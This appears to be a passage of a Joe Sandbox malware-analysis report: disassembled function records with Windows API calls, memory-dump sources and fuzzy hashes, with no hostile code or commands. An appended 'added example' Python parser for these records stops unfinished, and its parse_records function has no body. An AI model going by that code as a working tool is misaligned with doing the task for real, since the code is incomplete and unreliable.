                                                    • Part of subcall function 00007FF6CA9DEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA6E
                                                  Similarity
                                                  • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                  • String ID:
                                                  • API String ID: 502429940-0
                                                  APIs
                                                  • LoadBitmapW.USER32 ref: 00007FF6CA9EB02A
                                                  • GetObjectW.GDI32 ref: 00007FF6CA9EB05B
                                                    • Part of subcall function 00007FF6CA9E8624: FindResourceExW.KERNELBASE ref: 00007FF6CA9E863D
                                                    • Part of subcall function 00007FF6CA9E8624: SizeofResource.KERNEL32 ref: 00007FF6CA9E8659
                                                    • Part of subcall function 00007FF6CA9E8624: LoadResource.KERNEL32 ref: 00007FF6CA9E8673
                                                    • Part of subcall function 00007FF6CA9E8624: LockResource.KERNEL32 ref: 00007FF6CA9E8685
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalAlloc.KERNELBASE ref: 00007FF6CA9E86A6
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalLock.KERNEL32 ref: 00007FF6CA9E86BB
                                                    • Part of subcall function 00007FF6CA9E8624: CreateStreamOnHGlobal.COMBASE ref: 00007FF6CA9E86E8
                                                    • Part of subcall function 00007FF6CA9E8624: GdipAlloc.GDIPLUS ref: 00007FF6CA9E86FE
                                                    • Part of subcall function 00007FF6CA9E8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6CA9E8769
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalUnlock.KERNEL32 ref: 00007FF6CA9E878C
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalFree.KERNEL32 ref: 00007FF6CA9E8795
                                                  Strings
                                                  Similarity
                                                  • API ID: Global$Resource$AllocBitmapCreateGdipLoadLock$FindFreeFromObjectSizeofStreamUnlock
                                                  • String ID: ]
                                                  • API String ID: 2565863721-3352871620
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Thread$CreatePriority
                                                  • String ID: CreateThread failed
                                                  • API String ID: 2610526550-3849766595
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: DirectoryInitializeMallocSystem
                                                  • String ID: riched20.dll
                                                  • API String ID: 174490985-3360196438
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9E853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6CA9E856C
                                                    • Part of subcall function 00007FF6CA9DAAE0: LoadStringW.USER32 ref: 00007FF6CA9DAB67
                                                    • Part of subcall function 00007FF6CA9DAAE0: LoadStringW.USER32 ref: 00007FF6CA9DAB80
                                                    • Part of subcall function 00007FF6CA9C1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9C1FFB
                                                    • Part of subcall function 00007FF6CA9C129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CA9C1396
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9F01BB
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9F01C1
                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6CA9F01F2
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                  • String ID:
                                                  • API String ID: 3106221260-0
                                                  APIs
                                                  Similarity
                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2272807158-0
                                                  APIs
                                                  Similarity
                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2176759853-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 1875163511-0
                                                  • Opcode ID: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
                                                  • Instruction ID: fbe9b1ea263cd01f539cb75483dc3db4041ab50cd611f62fb9db87c0f746a1cd
                                                  • Opcode Fuzzy Hash: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
                                                  • Instruction Fuzzy Hash: 6331F712A2868691FB249F14F4653B9A3B0FB50786F544471E2CCC66EBDF7CE546C342
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1203560049-0
                                                  • Opcode ID: 3b5c7dfba4016e6e243c7c3b7e225e8d3a84efcc83b0b2c8433822de01f77114
                                                  • Instruction ID: 1a729629152e0d3c34fc7c257407d63f9c8ac83b20a4eff4ef99fb3abc460ef3
                                                  • Opcode Fuzzy Hash: 3b5c7dfba4016e6e243c7c3b7e225e8d3a84efcc83b0b2c8433822de01f77114
                                                  • Instruction Fuzzy Hash: 1721FD22A18A8181EA208F25F46626A7360FFC8796F004270EEDEC76D5DF3CD581CA00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3118131910-0
                                                  • Opcode ID: efdceb5f5ffab25265e5fdcae37b3fa604f3c5543451d082f18575ff986ab35b
                                                  • Instruction ID: 7cb199cf307aa670d06a459d829521c399371173cb2d2b6cba685d16870f0695
                                                  • Opcode Fuzzy Hash: efdceb5f5ffab25265e5fdcae37b3fa604f3c5543451d082f18575ff986ab35b
                                                  • Instruction Fuzzy Hash: 9F217962E2878181EA108F25F45626E7360FF88B96F501274EBDEC7695DF3CD581C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1203560049-0
                                                  • Opcode ID: 4ae5ded5c3556da1f0d03c02a2ab6d15854b36abb35067c68a226e6d7cfb6ad4
                                                  • Instruction ID: 098db75918da1599c33f49b4a5804d07b744f38266036092f8daa76430a821ef
                                                  • Opcode Fuzzy Hash: 4ae5ded5c3556da1f0d03c02a2ab6d15854b36abb35067c68a226e6d7cfb6ad4
                                                  • Instruction Fuzzy Hash: D121A762A2878181EA108F28F45512AB361FB887A6F501271EADDC37D5DF3CD481C704
                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF895
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF89B
                                                    • Part of subcall function 00007FF6CA9D3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                  • String ID:
                                                  • API String ID: 3587649625-0
                                                  • Opcode ID: 523cfcae4ce27e4da1045e17439fd3e37f9321daedba48ff7041e95377e0fec7
                                                  • Instruction ID: 7cc7a04f8d046d688ad94ec702ada9ee94c8bfeac483f615c2b6a004db750117
                                                  • Opcode Fuzzy Hash: 523cfcae4ce27e4da1045e17439fd3e37f9321daedba48ff7041e95377e0fec7
                                                  • Instruction Fuzzy Hash: D091D333A28B8190EB10EF24E4552AD6361FB84799F904175EA8EC7AEADF7CD585C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: b7d18fcdb9ce11e94f0f8a2afa8545fe9f5a6d7038082b9b3b6f763717e9c5a1
                                                  • Instruction ID: a782cfa191a95f2bea0a03be2cdb51b4c8d467984235c022a0e015bbae4199ce
                                                  • Opcode Fuzzy Hash: b7d18fcdb9ce11e94f0f8a2afa8545fe9f5a6d7038082b9b3b6f763717e9c5a1
                                                  • Instruction Fuzzy Hash: BF41A462F24A5185FB00EEB5E4622AD7360AF44BD9F141175EE9DE7ADBDE38D4828300
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6CA9D274D), ref: 00007FF6CA9D28A9
                                                  • GetLastError.KERNEL32(?,00007FF6CA9D274D), ref: 00007FF6CA9D28B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                  • Instruction ID: 738d3228eacabaa54de0bf9d5345f5e3ded36f90d06602a302fb842b9481c64a
                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                  • Instruction Fuzzy Hash: AD31D832F2969282EE644F2AF9516752350AF04BD6F140171DE9DEB791DE3CE4C2C741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1746051919-0
                                                  • Opcode ID: 0d2cfb920ea231b6e9d51c7db040a15a52ec3b00ba863ec475c32ede1f66f479
                                                  • Instruction ID: 1717e3cbca1d23a9c188cf17084ccb542bc20c2f4f717e07ba1793a61e0fae4f
                                                  • Opcode Fuzzy Hash: 0d2cfb920ea231b6e9d51c7db040a15a52ec3b00ba863ec475c32ede1f66f479
                                                  • Instruction Fuzzy Hash: 3231F222A28B8182EA10AF55F86636E7360EB84BD5F504275EBDC87BD6DF3CE0418704
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$BuffersFlushTime
                                                  • String ID:
                                                  • API String ID: 1392018926-0
                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                  • Instruction ID: d5560d8a3bcc1ebb5bf65dbaebdeae3cf97bd7aae5d9f6ba29b81371359505aa
                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                  • Instruction Fuzzy Hash: 2921E232E1DB5255EA628F51F5263BA6790AF02796F1440B1DECCC7292EE7CD8C6C301
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: LoadString
                                                  • String ID:
                                                  • API String ID: 2948472770-0
                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                  • Instruction ID: 268c71837820719d72fc8b488cd9485594b1fb5dbaebf73d93d1f308290a73af
                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                  • Instruction Fuzzy Hash: F1119370F186018AEA008F57B855124BBA1BB94FC1F944675CE8DE3B21DF7CE9A2C744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                  • Instruction ID: 5153aeeefe7c9ce123adff435e5f0c5a8c1e1d10e5bbc6541bf5cfc53be1806f
                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                  • Instruction Fuzzy Hash: FC119031E2864181EB608F25F8562697260EB45BA9F5443B1DAADC72D6CF3CE9D3C301
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ItemRectTextWindow$Clientswprintf
                                                  • String ID:
                                                  • API String ID: 3322643685-0
                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                  • Instruction ID: 9367f94b365032eff2db118c80b3acca469589c0ed3c5d888e5ad7fd91c9574b
                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                  • Instruction Fuzzy Hash: 7A019E24E2978A41FF597F92B17927A57916F85B4AF0800B0C8CEC729ADE2DE8D5C300
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CA9DEBAD,?,?,?,?,00007FF6CA9D5752,?,?,?,00007FF6CA9D56DE), ref: 00007FF6CA9DEB5C
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6CA9DEB6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Process$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1231390398-0
                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                  • Instruction ID: 6b4af337ea5bff66a4d1455805ea7e9dd6002dfc5076fe28e5ae1d05b6c24341
                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                  • Instruction Fuzzy Hash: DEE02B61F2498646DF4C8F56D4654E973A2BFCCB40B848035D64BC3614DE2CE1458B00
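                                                  The function records in this listing (an APIs block with call-site refs, a Memory Dump Source block whose Offset is the load address of the dumped image, and a Similarity block of IDs and fuzzy hashes) follow a fixed layout, which makes them easy to pivot on once parsed. The following Python parser is an added example and not part of the Joe Sandbox report or its tooling: it turns records in this layout into structured objects, rebases each call-site ref to an image-relative offset using the dump's Offset field, filters functions by the API they call, and drops LIBCMT (CRT-internal) helpers such as _invalid_parameter_noinfo_noreturn from the import view. The sample input is constructed from three records on this page, trimmed to the Similarity fields the example reads; the class and helper names are the example's own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample input: three records copied from this report, trimmed to
# the Similarity fields the example uses (the block layout is unchanged).
SAMPLE_RECORDS = """\
APIs
• SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6CA9D274D), ref: 00007FF6CA9D28A9
• GetLastError.KERNEL32(?,00007FF6CA9D274D), ref: 00007FF6CA9D28B8
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
APIs
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF895
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF89B
  • Part of subcall function 00007FF6CA9D3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$CloseFind
• Opcode ID: 523cfcae4ce27e4da1045e17439fd3e37f9321daedba48ff7041e95377e0fec7
APIs
• GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CA9DEBAD,?,?,?,?,00007FF6CA9D5752,?,?,?,00007FF6CA9D56DE), ref: 00007FF6CA9DEB5C
• GetProcessAffinityMask.KERNEL32 ref: 00007FF6CA9DEB6F
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
"""

# "• Name.MODULE(args), ref: ADDR", with or without the argument list, optionally
# prefixed by "Part of subcall function ADDR:" for calls made one level down.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Key: Value" bullets
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-F]+)")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                        # call-site address inside the memory dump
    subcall_of: int | None = None   # callee address when the call sits one level down


@dataclass
class FunctionRecord:
    fields: dict[str, str] = field(default_factory=dict)   # every "• Key: Value" bullet
    apis: list[ApiCall] = field(default_factory=list)

    @property
    def image_base(self) -> int:
        """Load address of the dumped image, taken from the Offset in Source File."""
        m = OFFSET_RE.search(self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else 0

    def rva(self, addr: int) -> int:
        """Image-relative offset of a dump address, for rebasing in IDA or Ghidra."""
        return addr - self.image_base


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing at each 'APIs' header and parse one record per function."""
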